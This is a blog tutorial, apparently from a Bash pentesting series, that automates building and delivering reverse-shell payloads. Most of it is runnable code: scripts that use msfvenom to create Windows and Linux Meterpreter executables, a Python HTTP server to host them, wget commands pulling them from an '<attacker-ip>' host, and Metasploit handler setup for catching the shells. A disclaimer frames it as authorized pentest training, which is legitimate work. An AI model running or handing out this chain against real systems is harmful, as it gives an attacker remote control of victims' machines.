Bash 8: Exploitation and Payload Delivery

Bash 8: Exploitation and Payload Delivery

Objective: Create and deliver payloads using Bash scripts to automate exploitation tasks in pentesting.


Important Notice

This post is for educational purposes only. Unauthorized use of these techniques may be illegal and is strictly prohibited. Always obtain proper authorization before conducting any penetration testing activities.


Diving into Exploitation with Bash Scripting

Welcome back to our series, "Pentesting - Scripting with Bash." In our last post, we automated the reconnaissance phase of pentesting, gathering valuable information about targets. Today, we’ll move into exploitation and payload delivery, a critical phase in pentesting where we use the information gathered to exploit vulnerabilities and gain access to target systems.

Understanding Exploitation

Exploitation involves taking advantage of vulnerabilities in a system to execute arbitrary code, gain unauthorized access, or perform other malicious activities. This phase often requires creating and delivering payloads that can be executed on the target system.

Why Automate Exploitation?

Automating exploitation tasks can save time, ensure consistency, and reduce the likelihood of errors. Using Bash scripts, you can automate the generation and delivery of payloads, making your exploitation process more efficient and repeatable.

Prerequisites

Before we begin, ensure you have the necessary tools installed:

  1. Metasploit Framework: Required for msfvenom to generate payloads.

     #Ubuntu
     sudo apt update
     sudo apt install snapd
     sudo snap install metasploit-framework
    
  2. Python 3: Required to run a simple HTTP server for payload delivery.

     sudo apt install python3
    

Generating Payloads

One of the most common tools for generating payloads is msfvenom, which is part of the Metasploit Framework. It allows you to create various types of payloads for different platforms.

Example: Generating reverse shell payloads for both Windows and Linux using msfvenom.

#!/bin/bash

# Generate reverse shell payloads for Windows and Linux
read -p "Enter the LHOST (local host IP): " lhost
read -p "Enter the LPORT (local port): " lport

windows_payload="reverse_shell.exe"
linux_payload="reverse_shell.elf"

# Generate Windows reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe -o $windows_payload
echo "Windows payload generated: $windows_payload"

# Generate Linux reverse shell payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf -o $linux_payload
echo "Linux payload generated: $linux_payload"

Save this script as generate_payloads.sh, make it executable, and run it:

chmod +x generate_payloads.sh
./generate_payloads.sh

This script generates reverse shell payloads for both Windows and Linux using msfvenom.

Explanation:

  • Windows Payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe -o $windows_payload

    • Generates a Windows Meterpreter reverse TCP payload.

    • Formats it as an executable file (-f exe).

    • Saves it to the specified output file.

  • Linux Payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf -o $linux_payload

    • Generates a Linux Meterpreter reverse TCP payload.

    • Formats it as an ELF file (-f elf).

    • Saves it to the specified output file.

Delivering Payloads

Once the payloads are generated, you need to deliver them to the target. This can be done through various methods, such as exploiting vulnerabilities in web applications or using social engineering techniques.

Example: Delivering payloads via a simple HTTP server.

#!/bin/bash

# Start a simple HTTP server to deliver the payloads
read -p "Enter the directory containing the payloads: " payload_dir
cd $payload_dir

echo "Starting HTTP server to deliver payloads..."
python3 -m http.server 8080

Save this script as deliver_payloads.sh, make it executable, and run it:

chmod +x deliver_payloads.sh
./deliver_payloads.sh

This script starts a simple HTTP server using Python to deliver the payloads.

Explanation:

  • python3 -m http.server 8080: This command starts an HTTP server on port 8080, serving files from the current directory. This allows you to easily share the payloads with the target by providing them with a URL to download.

Combining Payload Generation and Delivery

Let's create a comprehensive script that automates both payload generation and delivery for both Windows and Linux targets.

  1. Create a new script file named exploit.sh.

     touch exploit.sh
    
  2. Open the file in a text editor and add the following code:

     #!/bin/bash
    
     # Generate and deliver payloads for Windows and Linux
    
     # Function to generate payloads
     generate_payloads() {
         read -p "Enter the LHOST (local host IP): " lhost
         read -p "Enter the LPORT (local port): " lport
    
         windows_payload="reverse_shell.exe"
         linux_payload="reverse_shell.elf"
    
         # Generate Windows reverse shell payload
         msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe -o $windows_payload
         echo "Windows payload generated: $windows_payload"
    
         # Generate Linux reverse shell payload
         msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf -o $linux_payload
         echo "Linux payload generated: $linux_payload"
     }
    
     # Function to deliver payloads
     deliver_payloads() {
         read -p "Enter the directory containing the payloads: " payload_dir
         cd $payload_dir
    
         echo "Starting HTTP server to deliver payloads..."
         python3 -m http.server 8080
     }
    
     # Main function
     main() {
         generate_payloads
         deliver_payloads
     }
    
     main
    
  3. Save the file and make it executable:

     chmod +x exploit.sh
    
  4. Run the script:

     ./exploit.sh
    

This script automates the entire process of generating and delivering payloads for both Windows and Linux targets. It prompts for necessary input, generates the payloads using msfvenom, and starts a Python HTTP server to deliver the payloads.

Explanation:

  • generate_payloads Function:

    • Prompts for LHOST and LPORT.

    • Generates reverse shell payloads for Windows and Linux using msfvenom.

  • deliver_payloads Function:

    • Prompts for the directory containing the payloads.

    • Starts a simple HTTP server using Python to deliver the payloads.

  • main Function:

    • Calls the generate_payloads and deliver_payloads functions to automate the entire process.

How to Use the Script

  1. Run the Script:

  2. Input LHOST and LPORT:

    • When prompted, enter the local host IP (LHOST) and the local port (LPORT) that the reverse shells should connect to.
  3. Specify Payload Directory:

    • When prompted, enter the directory where the payloads should be stored. This is also where the HTTP server will be started to serve the payloads.
  4. Download the Payloads:

    • On the target machine, use a web browser or a command-line tool like wget or curl to download the payloads from the HTTP server. For example:

        wget http://<attacker-ip>:8080/reverse_shell.exe
        wget http://<attacker-ip>:8080/reverse_shell.elf
      
  5. Setting Up a Listener

    Before executing the payloads, you need to set up a listener on your local machine to catch the reverse shell connections. You can use Metasploit for this purpose.

    1. Start Metasploit:

       msfconsole
      
    2. Set Up a Multi-Handler for Windows:

       use exploit/multi/handler
       set payload windows/meterpreter/reverse_tcp
       set LHOST <your local IP>
       set LPORT <your local port>
       exploit
      
    3. Set Up a Multi-Handler for Linux:

      • Open a new Metasploit console tab or window, and set up a listener for Linux:

          msfconsole
          use exploit/multi/handler
          set payload linux/x86/meterpreter/reverse_tcp
          set LHOST <your local IP>
          set LPORT <your local port>
          exploit
        

This will start listeners on your specified LHOST and LPORT for both Windows and Linux payloads. Once the payloads are executed on the target machines, you should see Meterpreter sessions open, giving you remote access to the target systems.

Explanation:

  • Metasploit Console (msfconsole): Starts the Metasploit Framework console.

  • Multi-Handler: A generic payload handler for various types of payloads.

  • Setting LHOST and LPORT: Configures the handler to listen on the specified local IP and port.

  • Exploit: Starts the listener and waits for incoming connections.

  1. Execute the Payloads:

    • Run the downloaded payloads on the target machines. This will establish reverse shell connections back to your specified LHOST and LPORT.

    • For Windows, double-click the reverse_shell.exe file to execute it.

    • For Linux, navigate to the directory containing the reverse_shell.elf file and run:

        chmod +x reverse_shell.elf
        ./reverse_shell.elf
      

Conclusion

In this eighth post, we've learned how to automate the exploitation and payload delivery phase of pentesting using Bash scripts. By generating and delivering payloads automatically, you can streamline your exploitation tasks, save time, and ensure consistency. We've also covered how to set up a listener to catch the reverse shell connections once the payloads are executed.

In the next post, we'll explore post-exploitation tasks and how to automate them to maintain access and extract valuable information from compromised systems. Stay tuned, and happy scripting!